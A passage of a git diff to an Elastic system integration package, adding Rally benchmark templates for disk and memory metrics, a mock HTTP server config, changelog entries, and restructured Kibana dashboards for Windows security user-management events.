"system.diskio", + "namespace": "ep", + "type": "metrics" + }, + "ecs": { + "version": "8.0.0" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "snapshot": false, + "version": "8.12.1" + }, + "event": { + "agent_id_status": "verified", + "dataset": "system.diskio", + "duration": {{ $event_duration }}, + "module": "system" + }, + "host": { + "architecture": "x86_64", + "containerized": true, + "hostname": "docker-fleet-agent", + "id": "96bd755dd266474fb86bd80a98cbaad5", + "ip": "192.168.253.7", + "mac": "02-42-C0-A8-FD-07", + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "3.10.0-1160.105.1.el7.x86_64", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "metricset": { + "name": "diskio", + "period": 10000 + }, + "service": { + "type": "system" + }, + "system": { + "diskio": { + "io": { + "ops": {{ $system_diskio_io_ops }}, + "time": {{ $system_diskio_io_time }} + }, + "name": "{{ $system_diskio_name }}", + {{- if eq $system_diskio_name "sda"}} + "serial_number": "SN20240308001", + {{- else if eq $system_diskio_name "sda1"}} + "serial_number": "SN20240308002", + {{- else if eq $system_diskio_name "sda2"}} + "serial_number": "SN20240308003", + {{- else if eq $system_diskio_name "dm-0"}} + "serial_number": "SN20240308004", + {{- else }} + "serial_number": "SN20240308005", + {{- end }} + "read": { + "bytes": {{ $system_diskio_read_bytes }}, + "count": {{ $system_diskio_read_count }}, + "time": {{ $system_diskio_read_time }} + }, + "write": { + "bytes": {{ $system_diskio_write_bytes }}, + "count": {{ $system_diskio_write_count }}, + "time": {{ $system_diskio_write_time }} + } + } + } +} \ No newline at end of file diff --git a/packages/system/_dev/benchmark/rally/memory-benchmark.yml b/packages/system/_dev/benchmark/rally/memory-benchmark.yml new file mode 100644 index 00000000000..436e1679ace --- /dev/null +++ b/packages/system/_dev/benchmark/rally/memory-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 system.memory events ingested +data_stream: + name: memory +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./memory-benchmark/template.ndjson + config: + path: ./memory-benchmark/config.yml + fields: + path: ./memory-benchmark/fields.yml diff --git a/packages/system/_dev/benchmark/rally/memory-benchmark/config.yml b/packages/system/_dev/benchmark/rally/memory-benchmark/config.yml new file mode 100644 index 00000000000..c7b780eec7a --- /dev/null +++ b/packages/system/_dev/benchmark/rally/memory-benchmark/config.yml @@ -0,0 +1,35 @@ +fields: + - name: timestamp + period: -60m + - name: event_duration + range: + min: 0 + max: 100000 + - name: system_memory_used_bytes + range: + min: 8000000000 + max: 9000000000 + - name: system_memory_cached + range: + min: 1000000000 + max: 2000000000 + - name: system_memory_free + range: + min: 2000000000 + max: 3000000000 + - name: system_memory_actual_used_bytes + range: + min: 5000000000 + max: 7000000000 + - name: system_memory_actual_free + range: + min: 3000000000 + max: 5000000000 + - name: system_memory_swap_used_bytes + range: + min: 300000000 + max: 500000000 + - name: system_memory_swap_free + range: + min: 3000000000 + max: 4000000000 diff --git a/packages/system/_dev/benchmark/rally/memory-benchmark/fields.yml b/packages/system/_dev/benchmark/rally/memory-benchmark/fields.yml new file mode 100644 index 00000000000..709f320544a --- /dev/null +++ b/packages/system/_dev/benchmark/rally/memory-benchmark/fields.yml @@ -0,0 +1,18 @@ +- name: timestamp + type: date +- name: event_duration + type: long +- name: system_memory_used_bytes + type: long +- name: system_memory_free + type: long +- name: system_memory_cached + type: long +- name: system_memory_actual_used_bytes + type: long +- name: system_memory_actual_free + type: long +- name: system_memory_swap_used_bytes + type: long +- name: system_memory_swap_free + type: long diff --git a/packages/system/_dev/benchmark/rally/memory-benchmark/template.ndjson b/packages/system/_dev/benchmark/rally/memory-benchmark/template.ndjson new file mode 100644 index 00000000000..3292d96d6a3 --- /dev/null +++ b/packages/system/_dev/benchmark/rally/memory-benchmark/template.ndjson @@ -0,0 +1,94 @@ +{{- $event_duration := generate "event_duration" }} +{{- $timestamp := generate "timestamp" }} +{{- $system_memory_used_bytes := generate "system_memory_used_bytes" }} +{{- $system_memory_free := generate "system_memory_free" }} +{{- $system_memory_cached := generate "system_memory_cached" }} +{{- $system_memory_actual_used_bytes := generate "system_memory_actual_used_bytes" }} +{{- $system_memory_actual_free := generate "system_memory_actual_free" }} +{{- $system_memory_actual_sum := add $system_memory_actual_used_bytes $system_memory_actual_free }} +{{- $system_memory_swap_used_bytes := generate "system_memory_swap_used_bytes" }} +{{- $system_memory_swap_free := generate "system_memory_swap_free" }} +{{- $system_memory_swap_total := add $system_memory_swap_free $system_memory_swap_used_bytes }} +{{- $system_memory_swap_used_pct := divf $system_memory_swap_used_bytes $system_memory_swap_total }} +{{- $system_memory_total := add $system_memory_used_bytes $system_memory_free }} +{{- $system_memory_used_pct := divf $system_memory_used_bytes $system_memory_total }} +{ + "@timestamp": "{{ $timestamp.Format "2006-01-02T15:04:05.000Z07:00" }}", + "agent": { + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "name": "system-scale-123456", + "type": "metricbeat", + "version": "8.8.0" + }, + "data_stream": { + "dataset": "system.memory", + "namespace": "ep", + "type": "metrics" + }, + "ecs": { + "version": "8.0.0" + }, + "elastic_agent": { + "id": "404fc805-04b8-420a-9fcf-12d54b89d4fd", + "snapshot": false, + "version": "8.12.1" + }, + "event": { + "agent_id_status": "verified", + "dataset": "system.memory", + "duration": {{ $event_duration }}, + "module": "system" + }, + "host": { + "architecture": "x86_64", + "containerized": true, + "hostname": "docker-fleet-agent", + "id": "96bd755dd266474fb86bd80a98cbaad5", + "ip": "192.168.241.7", + "mac": "02-42-C0-A8-F1-07", + "name": "docker-fleet-agent", + "os": { + "codename": "focal", + "family": "debian", + "kernel": "3.10.0-1160.105.1.el7.x86_64", + "name": "Ubuntu", + "platform": "ubuntu", + "type": "linux", + "version": "20.04.6 LTS (Focal Fossa)" + } + }, + "metricset": { + "name": "memory", + "period": 10000 + }, + "service": { + "type": "system" + }, + "system": { + "memory": { + "actual": { + "free": {{ $system_memory_actual_free }}, + "used": { + "bytes": {{ $system_memory_actual_used_bytes }}, + "pct": {{ divf $system_memory_actual_used_bytes $system_memory_actual_sum }} + } + }, + "cached": {{ $system_memory_cached }}, + "free": {{ $system_memory_free }}, + "swap": { + "free": {{ $system_memory_swap_free }}, + "total": {{ $system_memory_swap_total }}, + "used": { + "bytes": {{ $system_memory_swap_used_bytes }}, + "pct": {{ $system_memory_swap_used_pct }} + } + }, + "total": {{ $system_memory_total }}, + "used": { + "bytes": {{ $system_memory_used_bytes }}, + "pct": {{ $system_memory_used_pct }} + } + } + } +} \ No newline at end of file diff --git a/packages/system/_dev/deploy/docker/docker-compose.yml b/packages/system/_dev/deploy/docker/docker-compose.yml index 316d3a9573e..39884915814 100644 --- a/packages/system/_dev/deploy/docker/docker-compose.yml +++ b/packages/system/_dev/deploy/docker/docker-compose.yml @@ -11,17 +11,15 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/*.log /var/log/" security: - image: docker.elastic.co/observability/stream:v0.4.0 + image: docker.elastic.co/observability/stream:v0.14.0 + volumes: + - ./files:/files:ro ports: - 8080 - volumes: - - ./sample_logs:/sample_logs:ro command: - - log - - --start-signal=SIGHUP + - http-server - --addr=:8080 - - -p=http-server - - /sample_logs/security.json.log + - --config=/files/security.stream.yml syslog: image: alpine volumes: diff --git a/packages/system/_dev/deploy/docker/files/security.stream.yml b/packages/system/_dev/deploy/docker/files/security.stream.yml new file mode 100644 index 00000000000..203c6b6e3a6 --- /dev/null +++ b/packages/system/_dev/deploy/docker/files/security.stream.yml @@ -0,0 +1,33 @@ +rules: + - path: "/api/v1/logs/services/search/jobs/export" + methods: ["POST"] + responses: + - status_code: 200 + body: |- + {{ minify_json ` + { + "lastrow": true, + "offset": 194, + "preview": false, + "result": { + "_bkt": "main~0~1212176D-89E1-485D-89E6-3ADC276CCA38", + "_cd": "0:315", + "_indextime": "1622471463", + "_raw": "11000410300x402000000000000014257SecurityWIN-41OB2LO92CR.wlbeat.local", + "_serial": "194", + "_si": [ + "69819b6ce1bd", + "main" + ], + "_sourcetype": "XmlWinEventLog:Security", + "_time": "2021-05-25 13:11:45.000 UTC", + "host": "VAGRANT", + "index": "main", + "linecount": "1", + "max_indextime": "1622471606", + "source": "WinEventLog:Security", + "sourcetype": "XmlWinEventLog:Security", + "splunk_server": "69819b6ce1bd" + } + } + `}} diff --git a/packages/system/_dev/deploy/docker/sample_logs/security.json.log b/packages/system/_dev/deploy/docker/sample_logs/security.json.log deleted file mode 100644 index 88e56a76d78..00000000000 --- a/packages/system/_dev/deploy/docker/sample_logs/security.json.log +++ /dev/null @@ -1 +0,0 @@ -{"preview": false,"offset": 194,"lastrow": true,"result": {"_bkt": "main~0~1212176D-89E1-485D-89E6-3ADC276CCA38","_cd": "0:315","_indextime": "1622471463","_raw": "11000410300x402000000000000014257SecurityWIN-41OB2LO92CR.wlbeat.local","_serial": "194","_si": ["69819b6ce1bd","main"],"_sourcetype": "XmlWinEventLog:Security","_time": "2021-05-25 13:11:45.000 UTC","host": "VAGRANT","index": "main","linecount": "1","max_indextime": "1622471606","source": "WinEventLog:Security","sourcetype": "XmlWinEventLog:Security","splunk_server": "69819b6ce1bd"}} \ No newline at end of file diff --git a/packages/system/changelog.yml b/packages/system/changelog.yml index b0fe40e874d..b8404a43f70 100644 --- a/packages/system/changelog.yml +++ b/packages/system/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.54.0" + changes: + - description: Enable 'secret' for the sensitive fields. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 +- version: "1.53.1" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/9053 - version: "1.53.0" changes: - description: Enable TSDB by default for core datastream. This improves storage usage and query performance. For more details, see https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds.html diff --git a/packages/system/data_stream/security/_dev/test/system/test-default-config.yml b/packages/system/data_stream/security/_dev/test/system/test-default-config.yml index 53e0095b607..ef355c51989 100644 --- a/packages/system/data_stream/security/_dev/test/system/test-default-config.yml +++ b/packages/system/data_stream/security/_dev/test/system/test-default-config.yml @@ -1,6 +1,5 @@ input: httpjson service: security -service_notify_signal: SIGHUP vars: url: http://{{Hostname}}:{{Port}}/api/v1/logs username: test diff --git a/packages/system/kibana/dashboard/system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab.json b/packages/system/kibana/dashboard/system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab.json index 6a4deaa1dee..4280e6bf5ef 100644 --- a/packages/system/kibana/dashboard/system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab.json +++ b/packages/system/kibana/dashboard/system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab.json @@ -1,4 +1,15 @@ { + "id": "system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyMiwxXQ==", "attributes": { "description": "New users and groups dashboard for the System integration in Logs", "kibanaSavedObjectMeta": { @@ -1179,10 +1190,6 @@ "title": "[Logs System] New users and groups", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-09T20:43:01.854Z", - "id": "system-0d3f2380-fa78-11e6-ae9b-81e5311e8cab", - "managed": false, "references": [ { "id": "logs-*", @@ -1220,6 +1227,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-277876d0-fa2c-11e6-bbd3-29c986c96e5a.json b/packages/system/kibana/dashboard/system-277876d0-fa2c-11e6-bbd3-29c986c96e5a.json index fcc6d9c6b42..fa237a08011 100644 --- a/packages/system/kibana/dashboard/system-277876d0-fa2c-11e6-bbd3-29c986c96e5a.json +++ b/packages/system/kibana/dashboard/system-277876d0-fa2c-11e6-bbd3-29c986c96e5a.json @@ -1,4 +1,15 @@ { + "id": "system-277876d0-fa2c-11e6-bbd3-29c986c96e5a", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyMywxXQ==", "attributes": { "description": "Sudo commands dashboard from the Logs System integration", "kibanaSavedObjectMeta": { @@ -641,10 +652,6 @@ "title": "[Logs System] Sudo commands", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-09T20:43:31.398Z", - "id": "system-277876d0-fa2c-11e6-bbd3-29c986c96e5a", - "managed": false, "references": [ { "id": "logs-*", @@ -677,6 +684,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-5517a150-f9ce-11e6-8115-a7c18106d86a.json b/packages/system/kibana/dashboard/system-5517a150-f9ce-11e6-8115-a7c18106d86a.json index a546f5f4b3e..01288c4ace0 100644 --- a/packages/system/kibana/dashboard/system-5517a150-f9ce-11e6-8115-a7c18106d86a.json +++ b/packages/system/kibana/dashboard/system-5517a150-f9ce-11e6-8115-a7c18106d86a.json @@ -1,4 +1,15 @@ { + "id": "system-5517a150-f9ce-11e6-8115-a7c18106d86a", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyNCwxXQ==", "attributes": { "description": "SSH dashboard for the System integration in Logs", "kibanaSavedObjectMeta": { @@ -732,10 +743,6 @@ "title": "[Logs System] SSH login attempts", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-09T20:44:09.120Z", - "id": "system-5517a150-f9ce-11e6-8115-a7c18106d86a", - "managed": false, "references": [ { "id": "logs-*", @@ -778,6 +785,7 @@ "type": "index-pattern" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/system/kibana/dashboard/system-71f720f0-ff18-11e9-8405-516218e3d268.json b/packages/system/kibana/dashboard/system-71f720f0-ff18-11e9-8405-516218e3d268.json index c024ef02fc5..aeb096c6b2a 100644 --- a/packages/system/kibana/dashboard/system-71f720f0-ff18-11e9-8405-516218e3d268.json +++ b/packages/system/kibana/dashboard/system-71f720f0-ff18-11e9-8405-516218e3d268.json @@ -1,4 +1,15 @@ { + "id": "system-71f720f0-ff18-11e9-8405-516218e3d268", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:28:13.685Z", + "created_at": "2024-01-22T13:28:13.685Z", + "version": "WzEyNSwxXQ==", "attributes": { "description": "User management activity.", "kibanaSavedObjectMeta": { @@ -81,6 +92,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 8, + "i": "1", + "w": 17, + "x": 0, + "y": 0 + }, + "panelIndex": "1", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -103,21 +124,22 @@ "title": "User Management Events - Description [Windows System Security]", "type": "markdown", "uiState": {} - } + }, + "type": "visualization" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 8, - "i": "1", - "w": 17, + "h": 16, + "i": "3", + "w": 9, "x": 0, - "y": 0 + "y": 56 }, - "panelIndex": "1", - "title": "", - "type": "visualization", - "version": "8.7.0" - }, - { + "panelIndex": "3", "embeddableConfig": { "attributes": { "references": [ @@ -310,21 +332,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Created - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "3", + "i": "5", "w": 9, - "x": 0, + "x": 9, "y": 56 }, - "panelIndex": "3", - "title": "Users Created - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "5", "embeddableConfig": { "attributes": { "references": [ @@ -517,21 +540,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Enabled - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "5", + "i": "6", "w": 9, - "x": 9, - "y": 56 + "x": 0, + "y": 79 }, - "panelIndex": "5", - "title": "Users Enabled - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "6", "embeddableConfig": { "attributes": { "references": [ @@ -724,21 +748,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Disabled - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "6", + "i": "7", "w": 9, - "x": 0, - "y": 79 + "x": 18, + "y": 56 }, - "panelIndex": "6", - "title": "Users Disabled - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "7", "embeddableConfig": { "attributes": { "references": [ @@ -931,21 +956,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Deleted - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "7", + "i": "9", "w": 9, "x": 18, - "y": 56 + "y": 79 }, - "panelIndex": "7", - "title": "Users Deleted - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "9", "embeddableConfig": { "attributes": { "references": [ @@ -1148,21 +1174,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Password Changes - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "9", + "i": "15", "w": 9, - "x": 18, + "x": 9, "y": 79 }, - "panelIndex": "9", - "title": "Users Password Changes - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "15", "embeddableConfig": { "attributes": { "references": [ @@ -1355,21 +1382,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Unlocked Users - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "15", + "i": "16", "w": 9, - "x": 9, - "y": 79 + "x": 18, + "y": 102 }, - "panelIndex": "15", - "title": "Unlocked Users - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "16", "embeddableConfig": { "attributes": { "references": [ @@ -1562,21 +1590,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Users Changes Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "16", + "i": "20", "w": 9, - "x": 18, + "x": 0, "y": 102 }, - "panelIndex": "16", - "title": "Users Changes Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "20", "embeddableConfig": { "attributes": { "references": [ @@ -1769,23 +1798,48 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 16, - "i": "20", - "w": 9, - "x": 0, - "y": 102 - }, - "panelIndex": "20", - "title": "Users Locked Out - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Users Locked Out - Table [Windows System Security]" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "user.name", + "source.domain", + "source.ip", + "winlog.logon.id", + "winlog.logon.type" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":[\"4624\"],\"type\":\"phrases\",\"value\":\"4624\"},\"query\":{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"match_phrase\":{\"event.code\":\"4624\"}}]}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Logon Details [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 46, @@ -1795,13 +1849,48 @@ "y": 72 }, "panelIndex": "22", - "panelRefName": "panel_22", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { "embeddableConfig": { - "enhancements": {} + "enhancements": {}, + "attributes": { + "columns": [ + "event.action", + "winlog.event_data.TargetUserName", + "user.domain", + "user.name", + "winlog.event_data.SubjectDomainName", + "winlog.logon.id", + "related.user" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"event.code\",\"negate\":false,\"params\":[\"4720\",\"4722\",\"4723\",\"4724\",\"4725\",\"4726\",\"4738\",\"4740\",\"4767\",\"4781\",\"4798\"],\"type\":\"phrases\",\"value\":\"4720, 4722, 4723, 4724, 4725, 4726, 4738, 4740, 4767, 4781, 4798\"},\"query\":{\"bool\":{\"minimum_should_match\":1,\"should\":[{\"match_phrase\":{\"event.code\":\"4720\"}},{\"match_phrase\":{\"event.code\":\"4722\"}},{\"match_phrase\":{\"event.code\":\"4723\"}},{\"match_phrase\":{\"event.code\":\"4724\"}},{\"match_phrase\":{\"event.code\":\"4725\"}},{\"match_phrase\":{\"event.code\":\"4726\"}},{\"match_phrase\":{\"event.code\":\"4738\"}},{\"match_phrase\":{\"event.code\":\"4740\"}},{\"match_phrase\":{\"event.code\":\"4767\"}},{\"match_phrase\":{\"event.code\":\"4781\"}},{\"match_phrase\":{\"event.code\":\"4798\"}}]}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:windows.security OR data_stream.dataset:system.security\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "User management Details - Search [Windows System Security]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 19, @@ -1811,11 +1900,20 @@ "y": 118 }, "panelIndex": "23", - "panelRefName": "panel_23", "type": "search", - "version": "8.7.0" + "version": "8.0.0" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 16, + "i": "33", + "w": 9, + "x": 9, + "y": 102 + }, + "panelIndex": "33", "embeddableConfig": { "attributes": { "references": [ @@ -2008,21 +2106,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 16, - "i": "33", - "w": 9, - "x": 9, - "y": 102 - }, - "panelIndex": "33", - "title": "Users Renamed - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Users Renamed - Table [Windows System Security]" }, { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 8, + "i": "cf0adfac-7cf2-479d-8ddb-1edeee62d37c", + "w": 31, + "x": 17, + "y": 0 + }, + "panelIndex": "cf0adfac-7cf2-479d-8ddb-1edeee62d37c", "embeddableConfig": { "enhancements": {}, "savedVis": { @@ -2045,21 +2144,22 @@ "title": "Dashboard links [Windows System Security]", "type": "markdown", "uiState": {} - } - }, - "gridData": { - "h": 8, - "i": "cf0adfac-7cf2-479d-8ddb-1edeee62d37c", - "w": 31, - "x": 17, - "y": 0 + }, + "type": "visualization" }, - "panelIndex": "cf0adfac-7cf2-479d-8ddb-1edeee62d37c", - "title": "", - "type": "visualization", - "version": "8.7.0" + "title": "" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 16, + "i": "a2871661-98a8-489b-b615-e66ebe3b971a", + "w": 17, + "x": 0, + "y": 8 + }, + "panelIndex": "a2871661-98a8-489b-b615-e66ebe3b971a", "embeddableConfig": { "attributes": { "references": [ @@ -2261,21 +2361,22 @@ "visualizationType": "lnsPie" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "User Management Actions [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "a2871661-98a8-489b-b615-e66ebe3b971a", - "w": 17, - "x": 0, + "i": "dd3e12e6-0d3c-448e-b0c4-91f7dc8742b6", + "w": 13, + "x": 17, "y": 8 }, - "panelIndex": "a2871661-98a8-489b-b615-e66ebe3b971a", - "title": "User Management Actions [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "dd3e12e6-0d3c-448e-b0c4-91f7dc8742b6", "embeddableConfig": { "attributes": { "references": [ @@ -2501,21 +2602,22 @@ "visualizationType": "lnsDatatable" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "User Event Actions - Table [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 16, - "i": "dd3e12e6-0d3c-448e-b0c4-91f7dc8742b6", - "w": 13, - "x": 17, + "i": "44697eb7-bb8e-4994-9e1b-95599f1b994a", + "w": 18, + "x": 30, "y": 8 }, - "panelIndex": "dd3e12e6-0d3c-448e-b0c4-91f7dc8742b6", - "title": "User Event Actions - Table [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "44697eb7-bb8e-4994-9e1b-95599f1b994a", "embeddableConfig": { "attributes": { "references": [ @@ -2637,21 +2739,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 16, - "i": "44697eb7-bb8e-4994-9e1b-95599f1b994a", - "w": 18, - "x": 30, - "y": 8 - }, - "panelIndex": "44697eb7-bb8e-4994-9e1b-95599f1b994a", - "title": "Target Users [Windows System Security]", - "type": "lens", - "version": "8.7.0" + "title": "Target Users [Windows System Security]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 25, + "i": "29f54335-78db-4c49-a3e0-a641fd0099f6", + "w": 48, + "x": 0, + "y": 24 + }, + "panelIndex": "29f54335-78db-4c49-a3e0-a641fd0099f6", "embeddableConfig": { "attributes": { "references": [ @@ -2924,21 +3027,22 @@ "visualizationType": "lnsHeatmap" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "User Management Events - Affected Users vs Actions - Heatmap [Windows System Security]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { - "h": 25, - "i": "29f54335-78db-4c49-a3e0-a641fd0099f6", - "w": 48, + "h": 7, + "i": "a6f12dd2-11fb-4039-8a8c-56b742a96e30", + "w": 9, "x": 0, - "y": 24 + "y": 49 }, - "panelIndex": "29f54335-78db-4c49-a3e0-a641fd0099f6", - "title": "User Management Events - Affected Users vs Actions - Heatmap [Windows System Security]", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "a6f12dd2-11fb-4039-8a8c-56b742a96e30", "embeddableConfig": { "attributes": { "references": [], @@ -3048,21 +3152,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "a6f12dd2-11fb-4039-8a8c-56b742a96e30", + "i": "39724444-251e-480d-b5f2-642362f8929e", "w": 9, - "x": 0, + "x": 9, "y": 49 }, - "panelIndex": "a6f12dd2-11fb-4039-8a8c-56b742a96e30", - "title": "", - "type": "lens", - "version": "8.7.0" - }, - { + "panelIndex": "39724444-251e-480d-b5f2-642362f8929e", "embeddableConfig": { "attributes": { "references": [], @@ -3172,21 +3277,22 @@ "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 7, - "i": "39724444-251e-480d-b5f2-642362f8929e", + "i": "9fdcbd20-59e6-4fd2-bc0a-72b0daaee79e", "w": 9, - "x": 9, + "x": 18, "y": 49 }, - "panelIndex": 